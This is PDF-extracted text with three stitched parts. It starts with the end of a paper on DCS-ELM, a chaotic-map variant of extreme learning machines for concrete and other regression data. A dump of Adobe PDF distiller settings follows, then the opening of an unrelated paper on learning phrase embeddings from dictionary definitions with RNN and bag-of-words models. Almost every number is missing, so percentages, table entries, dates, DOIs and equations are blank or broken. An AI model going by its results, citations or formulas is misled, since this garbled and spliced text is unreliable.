algorithm and . % better than the piecewise map- based dcs-elm algorithm. figure differences between the experimental and predicted values of dcs-elm algorithm in compressive strength test. (a) chebyshev. (b) iterative. (c) logistic. (d) piecewise. (e) tent. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the compressive strength experiment, the logistic map-based dcs-elm algorithm, which gives the best performance according to the rmse evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the iterative map-based dcs-elm algorithm, . % better than the piecewise map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. figure shows the performances of elm and dcs-elm algorithms in different data sets according to the mae value. in the v-funnel experiment, the iterative map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better than the tent map-based dcs-elm algorithm, . % better table comparison of the performances of elm and dcs-elm algorithms in sfrscc data sets. data sets evaluation metrics elm (k = ) dcs-elm (chebyshev) dcs-elm (iterative) dcs-elm (logistic) dcs-elm (piecewise) dcs-elm (tent) v-funnel r . . . . . . rmse . . . . . . mae . . . . . . t r . . . . . . rmse . . . . . . mae . . . . . . slump-flow r . . . . . . rmse . . . . . . mae . . . . . . fc r . . . . . . rmse . . . . . . mae . . . . . . figure comparison of elm and dcs-elm algorithms according to r value in experiments. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than the logistic map-based dcs-elm algorithm, . % better than the chebyshev map-based dcs-elm, . % better than the piecewise map-based dcs-elm algorithm and . % better than the basic elm algorithm. in the t experiment, the logistic map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better than the piecewise map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the tent map-based dcs-elm, . % better than the iterative map-based dcs-elm algorithm and . % better than the chebyshev map-based dcs-elm algorithm. in the slump-flow experiment, the iterative map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better figure comparison of elm and dcs-elm algorithms according to rmse value in experiments. full-size doi: . /peerj-cs. /fig- figure comparison of elm and dcs-elm algorithms according to the mae value in experiments. full-size doi: . /peerj-cs. /fig- altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than the logistic map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the tent map-based dcs-elm, . % better than the chebyshev map-based dcs-elm algorithm and . % better than the piecewise map- based dcs-elm algorithm. in the compressive strength experiment, the piecewise map-based dcs-elm algorithm, which gives the best performance according to the mae evaluation criteria, is . % better than the chebyshev map-based dcs-elm algorithm, . % better than the basic elm algorithm, . % better than the iterative map-based dcs-elm, . % better than the tent map-based dcs-elm algorithm and . % better than the logistic map-based dcs-elm algorithm. it has been demonstrated that the dcs-elm algorithm produces better results than the elm algorithm in all sfrscc data sets. general comparison of all data sets as a result of the study, it was observed that the use of chaotic maps in the elm algorithm increased the success performance in the sfrscc and public data sets. however, there is table results of all datasets. em lr svr welm k = kelm k = elm k = dcs-elm chebyshev dcs-elm iterative dcs-elm logistic dcs-elm piecewise dcs-elm tent energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . energy r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . house r . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . servo r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . vfunnel r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . t r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . slump-flow r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . fc r . . . . . . . . . . rmse . . . . . . . . . . mae . . . . . . . . . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ no clear superiority between five different maps. the performance rankings of chaotic maps vary according to the evaluation criteria and the type of data set. when it will be adapted to different data sets, it is recommended to determine the chaotic map by trial and error method. the results of all methods and data sets used in the article are given in table . table shows the success rankings of the algorithms used in different data sets. when the average values were taken according to different data sets, it was seen that the iterative chaotic map based dcs-elm method achieved the best average. piecewise map-based dcs-elm method took the second place. it has been observed that dcs-elm gives better results than lr, svr, welm and kelm algorithms. it has been observed that the dcs-elm method gives a much better performance as a percentage, especially in data sets where the elm method has a low performance rate. conclusions in this study, a novel method named dcs-elm is proposed to improve the elm algorithm. in this proposed method, different chaotic maps are used. these chaotic maps are chebyshev map, iterative map, logistic map, piecewise map and tent map. it has been shown that the performance of the dcs-elm algorithm changes according to the chaotic map used. the dcs-elm method proposed in this study has been tested in different data sets. the common parameters of the models designed in each data set are used the same. in addition, the test and training data sets used during the testing of the models were used the same. as a result of the study, it was observed that the dcs-elm algorithm is more stable, problem solving ability is more generalized and higher performance thanks to the use of chaotic maps in the elm algorithm. especially in datasets where elm or other algorithms showed poor performance, dcs-elm algorithm was able to perform better than basic elm, kelm, welm, lr and svr. it has been shown that problems such as accumulating randomly assigned number values in a certain place and repeating numbers can be prevented by using chaotic maps. the dcs-elm algorithm is provided to reach the best performance faster. the proposed discrete-time chaotic systems extreme learning machine algorithm can be appropriately used in regression problems. novel discrete time chaotic systems based machine learning table ranking of algorithms according to rmse value. lr svr welm k = kelm k = elm k = dcs-elm chebyshev dcs-elm iterative dcs-elm logistic dcs-elm piecewise dcs-elm tent energy energy house servo vfunnel t slump-flow fc mean rank . . . . . . . . . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm can be effectively used in different complex datasets. these proposed methods are novel and more detailed work can be done with parallel or distributed application. in addition, different studies can be done by adapting the chaotic maps to different versions of the elm algorithm. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � osman altay conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � mustafa ulas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � kursat esat alyamac conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: datasets and codes are available at github: https://github.com/mustafaulas/dcs-elm. data is also available at the uci machine learning repository: - house dataset: https://archive.ics.uci.edu/ml/datasets/real+estate+valuation+data+set. - servo dataset: https://archive.ics.uci.edu/ml/datasets/servo. - energy dataset: https://archive.ics.uci.edu/ml/datasets/energy+efficiency#. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references al-kazemi b, mohan ck. . training feedforward neural networks using multi-phase particle swarm optimization. in: proceedings of the th international conference on neural information processing, . iconip’ . vol. . piscataway: ieee, – . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/mustafaulas/dcs-elm https://archive.ics.uci.edu/ml/datasets/real&#x b;estate&#x b;valuation&#x b;data&#x b;set https://archive.ics.uci.edu/ml/datasets/servo https://archive.ics.uci.edu/ml/datasets/energy+efficiency# http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ alatas b. . chaotic bee colony algorithms for global numerical optimization. expert systems with applications ( ): – doi . /j.eswa. . . . altay ev, alatas b. . bird swarm algorithms with chaotic mapping. artificial intelligence review ( ): – doi . /s - - - . altay o, gurgenc t, ulas m, Özel c. . prediction of wear loss quantities of ferro-alloy coating using different machine learning algorithms. friction ( ): – doi . /s - - -z. altay o, ulas m. . the use of kernel-based extreme learning machine and well-known classification algorithms for fall detection. in: advances in computer communication and computational sciences. singapore: springer, – . altay o, ulas m, alyamac ke. . prediction of the fresh performance of steel fiber reinforced self-compacting concrete using quadratic svm and weighted knn models. ieee access : – doi . /access. . . arena p, caponetto r, fortuna l, rizzo a, la rosa m. . self-organization in nonrecurrent complex systems. international journal of bifurcation and chaos ( ): – doi . /s . baykal n, beyan t. . bulanık mantık: uzman sistemler ve denetleyiciler. ankara: bıçaklar kitabevi. berbergil v. . kendiliğinden yerleşen betonlarda Çelik lif kullanımının işlenebilirliğe etkisi. ph.d thesis, İstanbul teknik university, turkey. bilhan o, emiroglu me, miller cj, ulas m. . the evaluation of the effect of nappe breakers on the discharge capacity of trapezoidal labyrinth weirs by elm and svr approaches. flow measurement and instrumentation ( ): – doi . /j.flowmeasinst. . . . bozkurt n. . fiber takviyeli kendiliğinden yerleşen betonun mekanik ve durabilite Özelliklerinin araştırılması. ph.d thesis, fırat university, turkey. cao f, yang z, ren j, ling wk, zhao h, sun m, benediktsson ja. . sparse representation- based augmented multinomial logistic extreme learning machine with weighted composite features for spectral-spatial classification of hyperspectral images. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . caponetto r, criscione m, fortuna l, occhipinti d, occhipinti l. . programmable chaos generator, based on cnn architectures, with applications in chaotic communications. in: fifth ieee international workshop on cellular neural networks and their applications. proceedings (cat. no. th ). piscataway: ieee, – . corinaldesi v, moriconi g. . effect of different fibers and mineral additions on the performance of frscc. farmington hills: aci special publication, . deeb r. . flow of self-compacting concrete. ph.d thesis, united kingdom. dinç a. . kendiliğinden yerleşen Çelik lif donatılı betonların mekanik davranışına su/ince malzeme oranı ve lif dayanımının etkisi. ph.d thesis, İstanbul teknik university, turkey. dua d, graff c. . uci machine learning repository. irvine: university of california, school of information and computer science. el-dieb as, taha mr. . flow characteristics and acceptance criteria of fiber-reinforced self-compacted concrete (fr-scc). construction and building materials ( ): – doi . /j.conbuildmat. . . . frazão c, camões a, barros j, gonçalves d. . durability of steel fiber reinforced self-compacting concrete. construction and building materials ( ): – doi . /j.conbuildmat. . . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.flowmeasinst. . . http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /j.conbuildmat. . . http://dx.doi.org/ . /j.conbuildmat. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gencel o, brostow w, datashvili t, thedford m. . workability and mechanical performance of steel fiber-reinforced self-compacting concrete with fly ash. composite interfaces ( ): – doi . / x . gurgenc t, altay o, ulas m, ozel c. . extreme learning machine and support vector regression wear loss predictions for magnesium alloys coated using various spray coating methods. journal of applied physics ( ): doi . / . . huang f, huang j, jiang s, zhou c. . landslide displacement prediction based on multivariate chaotic model and extreme learning machine. engineering geology : – doi . /j.enggeo. . . . huang g, huang gb, song s, you k. . trends in extreme learning machines: a review. neural networks ( ): – doi . /j.neunet. . . . huang gb, zhou h, ding x, zhang r. . extreme learning machine for regression and multiclass classification. ieee transactions on systems, man, and cybernetics, part b ( ): – doi . /tsmcb. . . huang gb, zhu qy, siew ck. . extreme learning machine: theory and applications. neurocomputing ( – ): – doi . /j.neucom. . . . ilonen j, kamarainen jk, lampinen j. . differential evolution training algorithm for feed- forward neural networks. neural processing letters ( ): – . jansson a, löfgren i, lundgren k, gylltoft k, lofgren i. . bond of reinforcement in self-compacting steel-fibre reinforced concrete bond of reinforcement in self-compacting steel- fibre-reinforced concrete. magazine of concrete research ( ): – doi . /macr. . . karaboga d, akay b, ozturk c. . artificial bee colony (abc) optimization algorithm for training feed-forward neural networks. in: international conference on modeling decisions for artificial intelligence. berlin: springer, – . kassimi f. . développement et performance des bétons autoplaçants fibrés pour les applications de réparation. ph.d thesis, canada. korkmaz s. . kendiliğinden yerleşen lifli betonların Çekme elemanlarında kullanılabilirliği. master thesis, ondokuz mayıs university, turkey. korkut f, türkmenoğlu zf, taymuş rb, güler s. . Çelik ve sentetik liflerin kendiliğinden yerleşen betonlarin taze ve mekanik Özellikleri Üzerine etkisi. niğde Ömer halisdemir university mühendislik bilimleri dergisi ( ): – . long wj, lin hx, chen zr, zhang kl, wang wl. . mechanical properties of fiber reinforced self-compacting concrete. applied mechanics and materials : – doi . /www.scientific.net/amm. . . majdzadeh f. . fracture toughness of hybrid fiber reinforced self-compacting concrete. ph.d thesis, british columbia university, united kingdom. mohanty f, rup s, dash b, majhi b, swamy mns. . an improved scheme for digital mammogram classification using weighted chaotic salp swarm algorithm-based kernel extreme learning machine. applied soft computing ( part ): doi . /j.asoc. . . montana dj, davis l. . training feedforward neural networks using genetic algorithms. proceedings of the th international joint conference on artificial intelligence : – . nis a. . mechanical and rheological properties of steel fibre reinforced self-compacting concrete. ph.d thesis, boğaziçi university, turkey. altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / x http://dx.doi.org/ . / . http://dx.doi.org/ . /j.enggeo. . . http://dx.doi.org/ . /j.neunet. . . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /macr. . http://dx.doi.org/ . /www.scientific.net/amm. . http://dx.doi.org/ . /j.asoc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nozawa h. . a neural network model as a globally coupled map and applications based on chaos. chaos: an interdisciplinary journal of nonlinear science ( ): – doi . / . . ouedraogo h. . lif kullanımının kendiliğinden yerleşen beton (kyb) karışımlarının Özelliklerine etkisi. master thesis, uludağ university, turkey. ozer ab. . cide: chaotically initialized differential evolution. expert systems with applications ( ): – doi . /j.eswa. . . . pająk m, ponikiewski t. . flexural behavior of self-compacting concrete reinforced with different types of steel fibers. construction and building materials ( ): – doi . /j.conbuildmat. . . . quinlan jr. . learning with continuous classes. th australian joint conference on artificial intelligence : – . quinlan jr. . combining instance-based and model-based learning. in: proceedings of the tenth international conference on machine learning. – . rao bk, ravindra v. . steel fiber reinforced self-compacting concrete incorporating class f fly ash. international journal of engineering science and technology ( ): – . rumelhart de, hinton ge, williams rj. . learning representations by back-propagating errors. nature ( ): – doi . / a . sahmaran m, yaman io. . hybrid fiber reinforced self-compacting concrete with a high- volume coarse fly ash. construction and building materials ( ): – doi . /j.conbuildmat. . . . sahmaran m, yurtseven a, yaman io. . workability of hybrid fiber reinforced self-compacting concrete. building and environment ( ): – doi . /j.buildenv. . . . silva dn, pacifico ld, ludermir tb. . an evolutionary extreme learning machine based on group search optimization. in: ieee congress of evolutionary computation (cec). piscataway: ieee, – . tezel oo. . tiplerdeki Çelik ve polipropilen liflerin kendiliginden ˇ yerleşen betonlarda İşlenebilirliğe ve mekanik davranışa etkisi. master thesis, İstanbul teknik university, turkey. torrijos mc, barragan be, zerbino rl. . physical-mechanical properties, and mesostructure of plain and fibre reinforced self-compacting concrete. construction and building materials ( ): – doi . /j.conbuildmat. . . . tsanas a, xifara a. . accurate quantitative estimation of energy performance of residential buildings using statistical machine learning tools. energy and buildings ( ): – doi . /j.enbuild. . . . ulas m, altay o, gurgenc t, ozel c. . a new approach for prediction of the wear loss of pta surface coatings using artificial neural network and basic, kernel-based, and weighted extreme learning machine. friction : – . wang m, chen h, yang b, zhao x, hu l, cai zn, huang h, tong c. . toward an optimal kernel extreme learning machine using a chaotic moth-flame optimization strategy with applications in medical diagnoses. neurocomputing ( – ): – doi . /j.neucom. . . . xu y, shu y. . evolutionary extreme learning machine-based on particle swarm optimization. in: international symposium on neural networks. berlin: springer, – . yang z, cao f, zabalza j, chen w, cao j. . spectral and spatial kernel extreme learning machine for hyperspectral image classification. in: international conference on brain inspired cognitive systems. cham: springer, – . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.conbuildmat. . . http://dx.doi.org/ . / a http://dx.doi.org/ . /j.conbuildmat. . . http://dx.doi.org/ . /j.buildenv. . . http://dx.doi.org/ . /j.conbuildmat. . . http://dx.doi.org/ . /j.enbuild. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yang y, wang y, yuan x. . parallel chaos search based incremental extreme learning machine. neural processing letters ( ): – doi . /s - - - . yeh ic, hsu tk. . building real estate valuation models with comparative approach through case-based reasoning. applied soft computing ( ): – doi . /j.asoc. . . . yıldırım h, sertbaş b, berbergil v. . kendiliğinden yerleşen betonlarda polipropilen ve çelik lif kullanılmasının işlenebilirliğe etkisi. in: ulusal beton kongresi, : – . zhu qy, qin ak, suganthan pn, huang gb. . evolutionary extreme learning machine. pattern recognition ( ): – doi . /j.patcog. . . . altay et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dcs-elm: a novel method for extreme learning machine for regression problems and a new approach for the sfrscc introduction extreme learning machine gradient-based solution least squares norm datasets results and discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice learning to understand phrases by embedding the dictionary felix hill computer laboratory university of cambridge felix.hill@cl.cam.ac.uk kyunghyun cho∗ courant institute of mathematical sciences and centre for data science new york university kyunghyun.cho@nyu.edu anna korhonen department of theoretical and applied linguistics university of cambridge alk @cam.ac.uk yoshua bengio cifar senior fellow université de montréal yoshua.bengio@umontreal.ca abstract distributional models that learn rich seman- tic word representations are a success story of recent nlp research. however, develop- ing models that learn useful representations of phrases and sentences has proved far harder. we propose using the definitions found in everyday dictionaries as a means of bridg- ing this gap between lexical and phrasal se- mantics. neural language embedding mod- els can be effectively trained to map dictio- nary definitions (phrases) to (lexical) repre- sentations of the words defined by those defi- nitions. we present two applications of these architectures: reverse dictionaries that return the name of a concept given a definition or description and general-knowledge crossword question answerers. on both tasks, neural lan- guage embedding models trained on defini- tions from a handful of freely-available lex- ical resources perform as well or better than existing commercial systems that rely on sig- nificant task-specific engineering. the re- sults highlight the effectiveness of both neu- ral embedding architectures and definition- based training for developing models that un- derstand phrases and sentences. introduction much recent research in computational seman- tics has focussed on learning representations of arbitrary-length phrases and sentences. this task is challenging partly because there is no obvious gold standard of phrasal representation that could be used ∗ work mainly done at the university of montreal. in training and evaluation. consequently, it is diffi- cult to design approaches that could learn from such a gold standard, and also hard to evaluate or compare different models. in this work, we use dictionary definitions to ad- dress this issue. the composed meaning of the words in a dictionary definition (a tall, long-necked, spotted ruminant of africa) should correspond to the meaning of the word they define (giraffe). this bridge between lexical and phrasal semantics is use- ful because high quality vector representations of single words can be used as a target when learning to combine the words into a coherent phrasal repre- sentation. this approach still requires a model capable of learning to map between arbitrary-length phrases and fixed-length continuous-valued word vectors. for this purpose we experiment with two broad classes of neural language models (nlms): recur- rent neural networks (rnns), which naturally en- code the order of input words, and simpler (feed- forward) bag-of-words (bow) embedding models. prior to training these nlms, we learn target lexi- cal representations by training the word vec soft- ware (mikolov et al., ) on billions of words of raw text. we demonstrate the usefulness of our approach by building and releasing two applications. the first is a reverse dictionary or concept finder: a system that returns words based on user descriptions or defini- tions (zock and bilac, ). reverse dictionaries are used by copywriters, novelists, translators and other professional writers to find words for notions or ideas that might be on the tip of their tongue. transactions of the association for computational linguistics, vol. , pp. – , . action editor: chris callison-burch. submission batch: / ; revised / ; revised / ; published / . c© association for computational linguistics. distributed under a cc-by . license. for instance, a travel-writer might look to enhance her prose by searching for examples of a country that people associate with warm weather or an ac- tivity that is mentally or physically demanding. we show that an nlm-based reverse dictionary trained on only a handful of dictionaries identifies novel def- initions and concept descriptions comparably or bet- ter than commercial systems, which rely on signif- icant task-specific engineering and access to much more dictionary data. moreover, by exploiting mod- els that learn bilingual word representations (vulic et al., ; klementiev et al., ; hermann and blunsom, ; gouws et al., ), we show that the nlm approach can be easily extended to pro- duce a potentially useful cross-lingual reverse dic- tionary. the second application of our models is as a general-knowledge crossword question answerer. when trained on both dictionary definitions and the opening sentences of wikipedia articles, nlms pro- duce plausible answers to (non-cryptic) crossword clues, even those that apparently require detailed world knowledge. both bow and rnn models can outperform bespoke commercial crossword solvers, particularly when clues contain a greater number of words. qualitative analysis reveals that nlms can learn to relate concepts that are not directly con- nected in the training data and can thus generalise well to unseen input. to facilitate further research, all of our code, training and evaluation sets (together with a system demo) are published online with this paper. neural language model architectures the first model we apply to the dictionary-based learning task is a recurrent neural network (rnn). rnns operate on variable-length sequences of in- puts; in our case, natural language definitions, de- scriptions or sentences. rnns (with lstms) have achieved state-of-the-art performance in language modelling (mikolov et al., ), image caption generation (kiros et al., ) and approach state- of-the-art performance in machine translation (bah- danau et al., ). during training, the input to the rnn is a dic- tionary definition or sentence from an encyclopedia. https://www.cl.cam.ac.uk/˜fh / the objective of the model is to map these defin- ing phrases or sentences to an embedding of the word that the definition defines. the target word embeddings are learned independently of the rnn weights, using the word vec software (mikolov et al., ). the set of all words in the training data consti- tutes the vocabulary of the rnn. for each word in this vocabulary we randomly initialise a real-valued vector (input embedding) of model parameters. the rnn ‘reads’ the first word in the input by applying a non-linear projection of its embedding v parame- terised by input weight matrix w and b, a vector of biases. a = φ(wv + b) yielding the first internal activation state a . in our implementation, we use φ(x) = tanh(x), though in theory φ can be any differentiable non-linear func- tion. subsequent internal activations (after time-step t) are computed by projecting the embedding of the tth word and using this information to ‘update’ the internal activation state. at = φ(uat− + wvt + b). as such, the values of the final internal activation state units an are a weighted function of all input word embeddings, and constitute a ‘summary’ of the information in the sentence. . long short term memory a known limitation when training rnns to read lan- guage using gradient descent is that the error sig- nal (gradient) on the training examples either van- ishes or explodes as the number of time steps (sen- tence length) increases (bengio et al., ). conse- quently, after reading longer sentences the final in- ternal activation an typically retains useful infor- mation about the most recently read (sentence-final) words, but can neglect important information near the start of the input sentence. lstms (hochreiter and schmidhuber, ) were designed to mitigate this long-term dependency problem. at each time step t, in place of the single inter- nal layer of units a, the lstm rnn computes six internal layers iw,gi,gf,go,h and m. the first, gw, represents the core information passed to the lstm https://www.cl.cam.ac.uk/~fh / unit by the latest input word at t. it is computed as a simple linear projection of the input embedding vt (by input weights ww) and the output state of the lstm at the previous time step ht− (by update weights uw): iwt = wwvt + uwht− + bw the layers gi,gf and go are computed as weighted sigmoid functions of the input embeddings, again parameterised by layer-specific weight matrices w and u: gst = + exp(−(wsvt + usht− + bs)) where s stands for one of i,f or o. these vectors take values on [ , ] and are often referred to as gat- ing activations. finally, the internal memory state, mt and new output state ht, of the lstm at t are computed as mt =i w t �git + mt− �g f t ht =g o t �φ(mt), where � indicates elementwise vector multiplica- tion and φ is, as before, some non-linear function (we use tanh). thus, gi determines to what extent the new input word is considered at each time step, gf determines to what extent the existing state of the internal memory is retained or forgotten in com- puting the new internal memory, and go determines how much this memory is considered when comput- ing the output state at t. the sentence-final memory state of the lstm, mn , a ‘summary’ of all the information in the sen- tence, is then projected via an extra non-linear pro- jection (parameterised by a further weight matrix) to a target embedding space. this layer enables the target (defined) word embedding space to take a dif- ferent dimension to the activation layers of the rnn, and in principle enables a more complex definition- reading function to be learned. . bag-of-words nlms we implement a simpler linear bag-of-words (bow) architecture for encoding the definition phrases. as with the rnn, this architecture learns an embedding vi for each word in the model vocabulary, together with a single matrix of input projection weights w . the bow model simply maps an input definition with word embeddings v . . .vn to the sum of the projected embeddings ∑n i= wvi. this model can also be considered a special case of an rnn in which the update function u and nonlinearity φ are both the identity, so that ‘reading’ the next word in the input phrase updates the current representation more simply: at = at− + wvt. . pre-trained input representations we experiment with variants of these models in which the input definition embeddings are pre- learned and fixed (rather than randomly-initialised and updated) during training. there are several po- tential advantages to taking this approach. first, the word embeddings are trained on massive corpora and may therefore introduce additional linguistic or conceptual knowledge to the models. second, at test time, the models will have a larger effective vocab- ulary, since the pre-trained word embeddings typi- cally span a larger vocabulary than the union of all dictionary definitions used to train the model. 